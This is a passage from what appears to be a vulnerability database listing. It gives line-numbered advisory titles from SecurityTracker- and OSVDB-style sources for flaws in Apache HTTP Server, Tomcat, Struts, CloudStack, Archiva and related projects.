13103| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
13104| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
13105| [1008920] Apache mod_digest May Validate Replayed Client Responses
13106| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
13107| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
13108| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
13109| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
13110| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
13111| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
13112| [1008030] Apache mod_rewrite Contains a Buffer Overflow
13113| [1008029] Apache mod_alias Contains a Buffer Overflow
13114| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
13115| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
13116| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
13117| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
13118| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
13119| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
13120| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
13121| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
13122| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
13123| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
13124| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
13125| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
13126| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
13127| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
13128| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
13129| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
13130| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
13131| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
13132| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
13133| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
13134| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
13135| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
13136| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
13137| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
13138| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
13139| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
13140| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
13141| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
13142| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
13143| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
13144| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
13145| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
13146| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
13147| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
13148| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
13149| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
13150| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
13151| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
13152| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
13153| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
13154| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
13155| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
13156| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
13157| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
13158| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
13159| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
13160| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
13161| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
13162| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
13163| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
13164| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
13165| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
13166| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
13167| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
13168| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
13169| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
13170|
13171| OSVDB - http://www.osvdb.org:
13172| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
13173| [96077] Apache CloudStack Global Settings Multiple Field XSS
13174| [96076] Apache CloudStack Instances Menu Display Name Field XSS
13175| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
13176| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
13177| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
13178| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
13179| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
13180| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
13181| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
13182| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
13183| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
13184| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
13185| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
13186| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
13187| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
13188| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
13189| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
13190| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
13191| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
13192| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
13193| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
13194| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
13195| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
13196| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
13197| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
13198| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
13199| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
13200| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
13201| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
13202| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
13203| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
13204| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
13205| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
13206| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
13207| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
13208| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
13209| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
13210| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
13211| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
13212| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
13213| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
13214| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
13215| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
13216| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
13217| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
13218| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
13219| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
13220| [94279] Apache Qpid CA Certificate Validation Bypass
13221| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
13222| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
13223| [94042] Apache Axis JAX-WS Java Unspecified Exposure
13224| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
13225| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
13226| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
13227| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
13228| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
13229| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
13230| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
13231| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
13232| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
13233| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
13234| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
13235| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
13236| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
13237| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
13238| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
13239| [93541] Apache Solr json.wrf Callback XSS
13240| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
13241| [93521] Apache jUDDI Security API Token Session Persistence Weakness
13242| [93520] Apache CloudStack Default SSL Key Weakness
13243| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
13244| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
13245| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
13246| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
13247| [93515] Apache HBase table.jsp name Parameter XSS
13248| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
13249| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
13250| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
13251| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
13252| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
13253| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
13254| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
13255| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
13256| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
13257| [93252] Apache Tomcat FORM Authenticator Session Fixation
13258| [93172] Apache Camel camel/endpoints/ Endpoint XSS
13259| [93171] Apache Sling HtmlResponse Error Message XSS
13260| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
13261| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
13262| [93168] Apache Click ErrorReport.java id Parameter XSS
13263| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
13264| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
13265| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
13266| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
13267| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
13268| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
13269| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
13270| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
13271| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
13272| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
13273| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
13274| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
13275| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
13276| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
13277| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
13278| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
13279| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
13280| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
13281| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
13282| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
13283| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
13284| [93144] Apache Solr Admin Command Execution CSRF
13285| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
13286| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
13287| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
13288| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
13289| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
13290| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
13291| [92748] Apache CloudStack VM Console Access Restriction Bypass
13292| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
13293| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
13294| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
13295| [92706] Apache ActiveMQ Debug Log Rendering XSS
13296| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
13297| [92270] Apache Tomcat Unspecified CSRF
13298| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
13299| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
13300| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
13301| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
13302| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
13303| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
13304| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
13305| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
13306| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
13307| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
13308| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
13309| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
13310| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
13311| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
13312| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
13313| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
13314| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
13315| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
13316| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
13317| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
13318| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
13319| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
13320| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
13321| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
13322| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
13323| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
13324| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
13325| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
13326| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
13327| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
13328| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
13329| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
13330| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
13331| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
13332| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
13333| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
13334| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
13335| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
13336| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
13337| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
13338| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
13339| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
13340| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
13341| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
13342| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
13343| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
13344| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
13345| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
13346| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
13347| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
13348| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
13349| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
13350| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
13351| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
13352| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
13353| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
13354| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
13355| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
13356| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
13357| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
13358| [86901] Apache Tomcat Error Message Path Disclosure
13359| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
13360| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
13361| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
13362| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
13363| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
13364| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
13365| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
13366| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
13367| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
13368| [85430] Apache mod_pagespeed Module Unspecified XSS
13369| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
13370| [85249] Apache Wicket Unspecified XSS
13371| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
13372| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
13373| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
13374| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
13375| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
13376| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
13377| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
13378| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
13379| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
13380| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
13381| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
13382| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
13383| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
13384| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
13385| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
13386| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
13387| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
13388| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
13389| [83339] Apache Roller Blogger Roll Unspecified XSS
13390| [83270] Apache Roller Unspecified Admin Action CSRF
13391| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
13392| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
13393| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
13394| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
13395| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
13396| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
13397| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
13398| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
13399| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
13400| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
13401| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
13402| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
13403| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
13404| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
13405| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
13406| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
13407| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
13408| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
13409| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
13410| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
13411| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
13412| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
13413| [80300] Apache Wicket wicket:pageMapName Parameter XSS
13414| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
13415| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
13416| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
13417| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
13418| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
13419| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
13420| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
13421| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
13422| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
13423| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
13424| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
13425| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
13426| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
13427| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
13428| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
13429| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
13430| [78331] Apache Tomcat Request Object Recycling Information Disclosure
13431| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
13432| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
13433| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
13434| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
13435| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
13436| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
13437| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
13438| [77593] Apache Struts Conversion Error OGNL Expression Injection
13439| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
13440| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
13441| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
13442| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
13443| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
